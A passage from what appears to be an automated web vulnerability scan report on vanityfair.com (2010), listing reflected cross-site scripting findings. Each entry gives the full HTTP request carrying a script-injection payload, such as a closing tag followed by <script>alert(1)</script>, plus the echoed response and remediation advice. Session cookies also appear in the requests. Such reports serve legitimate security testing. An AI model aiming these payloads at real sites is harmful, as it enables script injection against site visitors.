Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:13 GMT
Date: Mon, 29 Nov 2010 16:50:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
Cause bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[299398869]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/wolcott/2010eadf6-->8d3012b5ea4/11/trust-but-verify-a-talking.html?proxyuri=online%2Fwolcott%2F2010eadf6--%3E8d3012b5ea4%2F11%2Ftrust-but-verify-a-talking.html':
escaped absolute path not valid.
->
...[SNIP]...

1.250. http://www.vanityfair.com/online/wolcott/2010/11/trust-but-verify-a-talking.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/trust-but-verify-a-talking.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b5b9'%3bc4bad56047d was submitted in the REST URL parameter 3. This input was echoed as 8b5b9';c4bad56047d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/wolcott/20108b5b9'%3bc4bad56047d/11/trust-but-verify-a-talking.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:11 GMT
Date: Mon, 29 Nov 2010 16:50:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/wolcott/20108b5b9';c4bad56047d/11/trust-but-verify-a-talking.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue g
...[SNIP]...

1.251. http://www.vanityfair.com/online/wolcott/2010/11/trust-but-verify-a-talking.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/trust-but-verify-a-talking.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36d44'%3bbc5f56bd128 was submitted in the REST URL parameter 4. This input was echoed as 36d44';bc5f56bd128 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/wolcott/2010/1136d44'%3bbc5f56bd128/trust-but-verify-a-talking.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:25 GMT
Date: Mon, 29 Nov 2010 16:50:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77409


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/wolcott/2010/1136d44';bc5f56bd128/trust-but-verify-a-talking.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue glob
...[SNIP]...

1.252. http://www.vanityfair.com/online/wolcott/2010/11/trust-but-verify-a-talking.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/trust-but-verify-a-talking.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload f7d43-->7c5b1a9ad55 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/wolcott/2010/11f7d43-->7c5b1a9ad55/trust-but-verify-a-talking.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:26 GMT
Date: Mon, 29 Nov 2010 16:50:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
se bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[225982422]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/wolcott/2010/11f7d43-->7c5b1a9ad55/trust-but-verify-a-talking.html?proxyuri=online%2Fwolcott%2F2010%2F11f7d43--%3E7c5b1a9ad55%2Ftrust-but-verify-a-talking.html':
escaped absolute path not valid.
->
...[SNIP]...

1.253. http://www.vanityfair.com/online/wolcott/2010/11/trust-but-verify-a-talking.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/trust-but-verify-a-talking.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bac78'%3babfe1f31b7c was submitted in the REST URL parameter 5. This input was echoed as bac78';abfe1f31b7c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/wolcott/2010/11/trust-but-verify-a-talking.htmlbac78'%3babfe1f31b7c HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:35 GMT
Date: Mon, 29 Nov 2010 16:50:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/wolcott/2010/11/trust-but-verify-a-talking.htmlbac78';abfe1f31b7c',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.254. http://www.vanityfair.com/online/wolcott/2010/11/trust-but-verify-a-talking.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/trust-but-verify-a-talking.html

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 821dd-->a719fc09d75 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/wolcott/2010/11/trust-but-verify-a-talking.html821dd-->a719fc09d75 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:37 GMT
Date: Mon, 29 Nov 2010 16:50:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
.exceptions.ApplicationBug:
-:[582372977]:- Thread id: 40. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/wolcott/2010/11/trust-but-verify-a-talking.html821dd-->a719fc09d75?proxyuri=online%2Fwolcott%2F2010%2F11%2Ftrust-but-verify-a-talking.html821dd--%3Ea719fc09d75':
escaped absolute path not valid.
->
...[SNIP]...

1.255. http://www.vanityfair.com/politics/features/2004/01/plame200401 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /politics/features/2004/01/plame200401

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af6ef"><script>alert(1)</script>9b3f5ed15df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /politics/features/2004/01/plame200401?af6ef"><script>alert(1)</script>9b3f5ed15df=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=299
Expires: Mon, 29 Nov 2010 16:54:52 GMT
Date: Mon, 29 Nov 2010 16:49:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 104937


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/politics/features/2004/01/plame200401?printable=true&af6ef"><script>alert(1)</script>9b3f5ed15df=1" title="Print this page">
...[SNIP]...

1.256. http://www.vanityfair.com/politics/features/2010/10/sarah-palin-201010 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /politics/features/2010/10/sarah-palin-201010

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94b3d"><script>alert(1)</script>7d5f42a8be3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /politics/features/2010/10/sarah-palin-201010?94b3d"><script>alert(1)</script>7d5f42a8be3=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:54:50 GMT
Date: Mon, 29 Nov 2010 16:49:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108421


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/politics/features/2010/10/sarah-palin-201010?printable=true&94b3d"><script>alert(1)</script>7d5f42a8be3=1" title="Print this page">
...[SNIP]...

1.257. http://www.vanityfair.com/politics/features/2010/11/election-night-slide-show-201011 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /politics/features/2010/11/election-night-slide-show-201011

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8fe1"><script>alert(1)</script>28071ff5b97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /politics/features/2010/11/election-night-slide-show-201011?e8fe1"><script>alert(1)</script>28071ff5b97=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:54:53 GMT
Date: Mon, 29 Nov 2010 16:49:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 105835


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/politics/features/2010/11/election-night-slide-show-201011?printable=true&e8fe1"><script>alert(1)</script>28071ff5b97=1" title="Print this page">
...[SNIP]...

1.258. http://www.vanityfair.com/search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e465"><script>alert(1)</script>bd4d9d25178 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?5e465"><script>alert(1)</script>bd4d9d25178=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:37:19 GMT
Date: Mon, 29 Nov 2010 16:32:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/search?printable=true&5e465"><script>alert(1)</script>bd4d9d25178=1" title="Print this page">
...[SNIP]...

1.259. http://www.vanityfair.com/search [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /search

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload bd08c<script>alert(1)</script>50d29e7cef0 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?query=(+keywords%3a%22Web+Exclusives%22+)+AND+(+section%3a(%22hollywood%22+OR+%22business%22+OR+%22politics%22+OR+%22culture%22+OR+%22society%22+OR+%22style%22+OR+%22blogs%22+OR+%22Video%22)+)+AND+(+type%3a(%22article_v2%22+OR+%22index_v2%22+OR+%22list%22+OR+%22video_v2%22+)+)bd08c<script>alert(1)</script>50d29e7cef0& HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:53:02 GMT
Date: Mon, 29 Nov 2010 16:48:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81789


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
Web Exclusives" ) AND ( section:("hollywood" OR "business" OR "politics" OR "culture" OR "society" OR "style" OR "blogs" OR "Video") ) AND ( type:("article_v2" OR "index_v2" OR "list" OR "video_v2" ) )bd08c<script>alert(1)</script>50d29e7cef0</h2>
...[SNIP]...

1.260. http://www.vanityfair.com/search [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /search

Issue detail

The value of the query request parameter is copied into the HTML document as text between TITLE tags. The payload a0ae3</title><script>alert(1)</script>20e1459f959 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?query=a0ae3</title><script>alert(1)</script>20e1459f959& HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
